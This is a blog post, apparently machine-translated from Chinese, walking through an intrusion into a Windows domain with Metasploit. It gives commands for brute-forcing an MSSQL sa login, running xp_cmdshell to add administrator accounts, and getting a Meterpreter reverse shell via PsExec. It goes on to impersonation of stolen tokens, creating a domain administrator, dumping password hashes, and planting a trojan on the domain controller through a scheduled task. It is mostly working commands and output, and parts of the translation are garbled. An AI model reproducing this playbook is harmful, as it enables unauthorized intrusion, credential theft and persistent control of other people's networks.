Overall frame diagram
650) this.width=650; "src=" Http://s3.51cto.com/wyfs02/M02/5B/45/wKiom1UDxHHwQFHOAAEFNonb3io857.jpg "title=" Picture 1.png "alt=" Wkiom1udxhhwqfhoaaefnonb3io857.jpg "/>
650) this.width=650; "src=" Http://s3.51cto.com/wyfs02/M00/5B/3F/wKioL1UDxafD2Ll9AACWNarE2vc043.jpg "title=" Picture 2.png "alt=" Wkiol1udxafd2ll9aacwnare2vc043.jpg "/>
Leveraging MSF
Use Auxiliary/scanner/portscan/tcp
Some of the related ports can be swept.
After discovery of port 1433, a brute force attempt was made against MSSQL.
Mssql_login
After the crack (this crack also mainly look at the dictionary) to carry out the characteristics of MSSQL, xp_cmdshell command operation
Use Auxiliary/scanner/mssql/mssql_exec
Set rhost IP
Set username SA
Set Password Password
Set cmd whoami//This is the point, here's the command
Exploit
650) this.width=650; "src=" Http://s3.51cto.com/wyfs02/M01/5B/3F/wKioL1UDxcfy0FHTAAB6b0pkNUU357.jpg "title=" Picture 3.png "alt=" Wkiol1udxcfy0fhtaab6b0pknuu357.jpg "/>
If you are adding users
Set cmd net users Kaifeng kaifeng/add
Exploit
Once a command is executed, the next execution command will be re-cmd
Set cmd net localgroup administrators Kaifeng/add
Exploit
Attack execution Complete
Using PsExec
Make a bounce connection and get a Meterpreter
650) this.width=650; "src=" Http://s3.51cto.com/wyfs02/M00/5B/3F/wKioL1UDxfCy_1oAAABaItV0cf4622.jpg "title=" Picture 5.png "alt=" Wkiol1udxfcy_1oaaabaitv0cf4622.jpg "/>
Run GETGUI-E
Use Auxiliary/scanner/portscan/tcp
Exploit
650) this.width=650; "src=" Http://s3.51cto.com/wyfs02/M00/5B/45/wKiom1UDxQPBGVJUAABDrD5AJ3U489.jpg "title=" Picture 6.png "alt=" Wkiom1udxqpbgvjuaabdrd5aj3u489.jpg "/>
Proof 3389 is open.
Start stealing tokens
Use Incognito
List_tokens-u
Impersonate_token the tokens listed above
If it succeeds, it has already been attacked by another host. Can enter the shell port for WhoAmI to view
Then set up a domain administrator to log in and manage the entire domain
Net users Kaifeng Kaifeng/add/domain
Net localgroup Administrators Kaifeng/add/domain
Then use
Psexec login, user name and password have been established
After the login is successful, you can view the management of the whole domain.
View the hash value of the entire domain by Meterpreter Dumphash
If you take down a domain administrator, you can use the export hash to get the other machine when you want to take down the other machines. Or the use of tokens to other machines, and then upload a trojan, into the shell, set a time to execute, in the MSF to listen, you can get permissions.
Below the domain administrator
Meterpreter > Upload/var/www/door.exe c \
Meterpreter > Shell
C:\windows\system32>dir c \
c:\windows\system32> replication to DIS9 domain management
C:\>copy Door.exe \\DIS9TEAM-DOMAIN\c$
Copy door.exe \\DIS9TEAM-DOMAIN\c$
C:\>
Time to get Dis9team-domain
C:\>net time \\DIS9TEAM-DOMAIN
C:\>
Time is 05.02, add a job 5.04 run Trojan Door.exe then MSF listens
C:\at \\DIS9TEAM-DOMAIN 05:04 C:\door.exe
At \\DIS9TEAM-DOMAIN 05:04 C:\door.exe
C:\>exit
Meterpreter > Background
[*] Backgrounding Session 2 ...
MSF exploit (handler) > Exploit
[*] Started Reverse Handler on 1.1.1.3:4444
[*] Starting the payload handler.
You can use this method to get the other machine.
Knowledge expansion
Featured feature 1: Quick right
Getsystem command to quickly withdraw power
There's nothing simpler than this.
One instruction, you have system permissions.
Meterpreter will try to get you system permissions in a variety of ways
Featured Features 2:hashdump
Running this command: Run Post/windows/gather/hashdump
A command you will be able to get the contents of the SAM database in Windows
is an encrypted user name and password
Featured feature 3: Direct open 3389
The Getgui command is a newly added command Meterpreter
This command allows you to easily open 3389 remote management on the target system.
This command has two uses: Run GETGUI-E (just hitKaiyuanProcess Management)
Run Getgui-u hacker-p s3cr3t (hitKaiyuanProcess management and create a new username for the hacker password for the S3CR3T account)
Featured feature 4: Networksniffing
Meterpreter has a very strong networksniffingAbility
It can be networked without any drivers installed on the target systemsniffing
And it's smart enough to get its own traffic to be ignored.
Featured feature 5: Network relay
Often invade LAN hackers encounter the biggest difficulties when unable to cross the NAT
Now, with the Meterpreter, it's easy.
Meterpreter can turn a computer you've hacked into a trunk to invade another computer on the same LAN.
This article is from the "Redbull" blog, make sure to keep this source http://redbull.blog.51cto.com/9796528/1620309
Attacking the client PC through SA permissions, to the intranet domain Infiltration system class